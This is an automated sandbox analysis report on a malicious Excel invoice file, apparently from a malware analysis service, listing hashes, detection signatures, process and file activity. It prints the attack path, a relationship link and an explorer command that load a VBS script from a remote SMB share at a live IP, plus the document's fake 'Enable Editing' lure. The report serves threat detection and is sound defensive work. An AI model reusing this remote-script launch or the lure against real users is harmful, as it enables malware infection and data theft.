Windows Analysis Report
re-march-26-2024-9856.xlsx

Overview

General Information

Sample name: re-march-26-2024-9856.xlsx
Analysis ID: 1415996
MD5: 0fe64551215d4dd591d98b165d74d986
SHA1: a507acb09dc6ecabcf510aceaac6febd51f01e72
SHA256: 16663b57e182a8f945a9aa5f70627b4ffbd6369784c5744eff304ecacc40fb7f
Tags: Invoicexlsx

Detection

MAC Stealer
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected MalDoc
Detected suspicious Microsoft Office reference URL
Opens network shares
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Document misses a certain OLE stream usually present in this Microsoft Office document type
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Explorer Process Tree Break
Tries to load missing DLLs

Classification

Exploits

Source: drawing1.xml.rels Extracted files from sample: file:///\\170.130.55.130\share\a\report-26-2024.vbs..........
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24F09391.gif

System Summary

Source: Screenshot number: 4 Screenshot OCR: Enable Editing'. a 14 I 15 16 17 Open 18 19 20 21 22 23 24 Stay in the groove wIth .Micro
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing'. Stay in the groove with Microsoft Office Excel integration with Microsoft Azure C
Source: Document image extraction number: 2 Screenshot OCR: Enable Editing'. Open Stay in the groove wIth Microsoft Office Excel integrauon with Microsoft Az
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 770B0000 page execute and read and write
Source: CCE0.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: explorerframe.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: duser.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: davhlpr.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe Section loaded: duser.dll
Source: C:\Windows\explorer.exe Section loaded: dui70.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe Section loaded: slc.dll
Source: C:\Windows\explorer.exe Section loaded: secur32.dll
Source: C:\Windows\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\explorer.exe Section loaded: winsta.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\explorer.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: mpr.dll
Source: C:\Windows\explorer.exe Section loaded: davhlpr.dll
Source: C:\Windows\explorer.exe Section loaded: version.dll
Source: C:\Windows\explorer.exe Section loaded: shdocvw.dll
Source: C:\Windows\explorer.exe Section loaded: msisip.dll
Source: classification engine Classification label: mal64.troj.spyw.expl.winXLSX@3/6@0/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$re-march-26-2024-9856.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6DA0.tmp
Source: re-march-26-2024-9856.xlsx OLE indicator, Workbook stream: true
Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe explorer \\170.130.55.130\share\a\Report-26-2024.vbs..........
Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe explorer \\170.130.55.130\share\a\Report-26-2024.vbs..........
Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: re-march-26-2024-9856.xlsx Initial sample: OLE zip file path = xl/media/image1.gif
Source: re-march-26-2024-9856.xlsx Initial sample: OLE zip file path = xl/media/image2.gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: re-march-26-2024-9856.xlsx Initial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (9 identical entries)
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX (5 identical entries)
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\SysWOW64\explorer.exe TID: 2428 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2836 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: drawing1.xml.rels, type: SAMPLE
Source: C:\Windows\SysWOW64\explorer.exe File opened: \\170.130.55.130\share (6 identical entries)
Source: C:\Windows\SysWOW64\explorer.exe File opened: \\170.130.55.130\share\a
Source: C:\Windows\explorer.exe File opened: \\170.130.55.130\share\a\Report-26-2024.vbs (2 identical entries)
Source: C:\Windows\explorer.exe File opened: \\170.130.55.130\share\

Remote Access Functionality

Source: Yara match File source: drawing1.xml.rels, type: SAMPLE
No contacted IP infos